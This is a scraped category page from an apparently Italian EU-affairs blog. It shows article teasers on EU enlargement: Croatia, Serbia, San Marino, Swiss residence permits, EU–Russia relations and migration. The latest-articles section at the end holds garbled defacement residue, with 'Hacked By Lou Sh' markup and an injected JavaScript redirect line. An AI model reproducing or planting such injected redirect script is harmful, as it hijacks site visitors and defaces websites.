EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Allargamento

Allargamento


Allargamento

it

Dopo la Slovenia, membro dal 2004, la Croazia sarà il secondo dei sei Paesi ex jugoslavi a diventare membro dell’Ue.

Durante il fine settimana appena trascorso i cittadini croati sono stati chiamati alle urne per eleggere i loro dodici rappresentanti al parlamento europeo. Questo ad esattamente due mesi e mezzo dall’ingresso del Paese ex jugoslavo nell’Unione europea, il primo luglio prossimo (la Croazia (...)

it

Nella proposta di risoluzione sull'integrazione dei migranti, gli effetti sul mercato del lavoro e la dimensione esterna del coordinamento in materia di sicurezza sociale presentata dal Parlamento europeo vengono considerati alcuni punti fondamentali relativi alla demografia europea, all'età anagrafica dei suoi abitanti, all'occupazione e alle future prospettive di competitività nel campo del lavoro che dovranno essere affrontate.

Viene rilevato quindi che la popolazione europea in età lavorativa è in diminuzione dal 2012 e che senza l’immigrazione, tale tendenza è destinata a peggiorare. Riferendosi poi ai sondaggi dell’Eurobarometro, viene riportato che il 70% dei cittadini UE considera gli immigrati necessari al (...)

it

Negli scorsi giorni è stata presentata la relazione di allargamento del 2012, che pone i Paesi richiedenti sempre di più sotto la lente d’ingrandimento; la prossima tappa di avvicinamento dei Nove a Bruxelles si terrà a dicembre. L’obiettivo dell’Unione europea è di inglobare il maggior numero di Paesi europei per consolidare il ruolo del Vecchio continente nel tessuto internazionale.

E’ in continua evoluzione il lungo iter di allargamento dell’Unione europea. L’organo comunitario prosegue il processo di apertura dei propri confini nei confronti di numerosi Paesi che aspirano a sventolare la bandiera con le dodici stelle dorate su campo blu. L’obiettivo –dichiarato- di (...)

it

Washington DC ha ospitato, dal tre al nove giugno, la settima edizione del G8&G20 Youth Summits. Si tratta di eventi giovanili che si svolgono, ogni anno, parallelamente ai celebri incontri internazionali dei Leaders mondiali, riunendo centinaia di giovani e brillanti studenti provenienti da tutti i paesi del G20.

Dopo i primi incontri virtuali per la stesura dell’Agenda dei temi di discussione, i giovani Ministri si trovano a dibatterne in prima persona attorno al tavolo di negoziazione. Tutto questo porta, infine, alla stesura di un comunicato Finale, conosciuto col nome di Final Communiqué, di cui vi (...)

it

Nuovo momento di tensione tra Unione Europea e Svizzera. Questa volta la questione riguarda i permessi di soggiorno da concedere ai cittadini provenienti da alcuni Stati europei, soprattutto dell’Est Europa. La Svizzera ha deciso di dare un taglio all’eccessiva immigrazione e ha ridotto il numero dei premessi. Il nuovo regolamento entrerà in vigore dal primo maggio 2012.

L’Europa e la Svizzera sono nuovamente ai farri corti. L’Esecutivo di Berna ha infatti annunciato che a partire dal primo giorno di maggio del 2012, entrerà in vigore un nuovo regolamento, della durata di un anno, che ridurrà a duemila il numero dei permessi di soggiorno da concedere ai cittadini (...)

it

Poco più di un mese fa ha destato scalpore la decisione di annullare il referendum per conoscere il pensiero dei sammarinesi a riguardo dell'entrata nell'Ue. Ora, un nuovo accordo è venuto alla luce e prevede almeno quarantacinque normative approvate dall'Ue alle quali San Marino dovrà adempire onde evitare la caduta dei diritti derivanti da tale accordo. Il patto sancisce che l'enclave non aderirà all'Unione ma avrà un percorso che pian piano lo porterà ad integrarsi nell'organismo europeo per eccellenza

Antonella Mularoni, Segretario di Stato per gli Affari Esteri, e Olli Rehn, vice Presidente della Commissione europea e Commissario per gli Affari economici e monetari, hanno siglato a Bruxelles un accordo monetario tra San Marino e l’Unione Europea. Alla fine del 2000 il piccolo Stato (...)

it

I leader dell'Unione europea hanno deciso, il 2 Marzo 2012, di concedere alla Serbia la possibilità di entrare a far parte del massimo organismo europeo. La decisione è stata presa dopo una riunione a Bruxelles dove è stato necessario superare le resistenze della Romania, la quale, conoscendo molto bene la situazione delle proprie minoranze valacche e romene in Serbia, aveva bloccato temporaneamente l'assegnazione dello status di candidato all'UE.

Finalmente, viene da dire, la Serbia ha ufficialmente la possibilità di entrare a far parte dell’UE. L’ultimo ostacolo, in ordine di tempo, che ha dovuto affrontare, è stata la forte opposizione romena la quale cercava di ottenere maggiori garanzie per le circa 40.000 persone facenti parte delle (...)

en

The Russian Presidential elections have once again revealed the EU’s many contradictions and exposed its dwarf-size political mass. The relation has always been peculiar: geographically, Europe and Russia are overlapping entities: half of Europe is Russia; half of Russia is in Europe. However, politics do not necessarily take this axiomatically – either in Europe or in Russia - and the relation between the two has witnessed an alternation of attraction and cooperation, with competition and mistrust.

Moscow is promoting an equal and strategic relationship with Brussels (similarly to the NATO-Russia Council) that excludes the long-term objective of full-fledged integration but allows Russia to claim its great power status. Vladimir Putin put re-integration of the post-Soviet space high on (...)

it

On the eve of the Russian elections is worth looking at the relations between Europe and Russia and of the political implications for the EU of the elections. The relation has always been peculiar: geographically, Europe and Russia are overlapping entities: half of Europe is Russia; half of Russia is in Europe. However, politics, in contrast to geography, do not necessarily take this axiomatically – either in Europe or in Russia. The relations between Russia and Europe have in fact been marked by attraction (and sometimes emulation on the part of Moscow) and need to cooperate, periodically replaced by competition and mistrust. Similar ups and downs have also characterized the institutional ties between the Russian Federation and the EU.

Moscow’s leadership is promoting an equal and strategic relationship with Brussels (similarly to the NATO-Russia Council) that excludes the long-term objective of full-fledged integration but allows Russia to claim its great power status. Putin put re-integration of the post-Soviet space high on (...)

it

Il “sì” conquista la maggioranza alle urne con il 66,3% nel referendum del 22 gennaio scorso dando così il via libera all’ingresso dell’ex Stato jugoslavo in Europa.

Il 66,3% dei partecipanti al referendum ha espresso il proprio voto favorevole per l’entrata nell’Unione europea. Il fronte dei “no” si è attestato intorno al 33% ma a suscitare qualche malumore è stata la bassa affluenza alle urne che non ha raggiunto il 45% (per la precisione il 43%) anche in (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France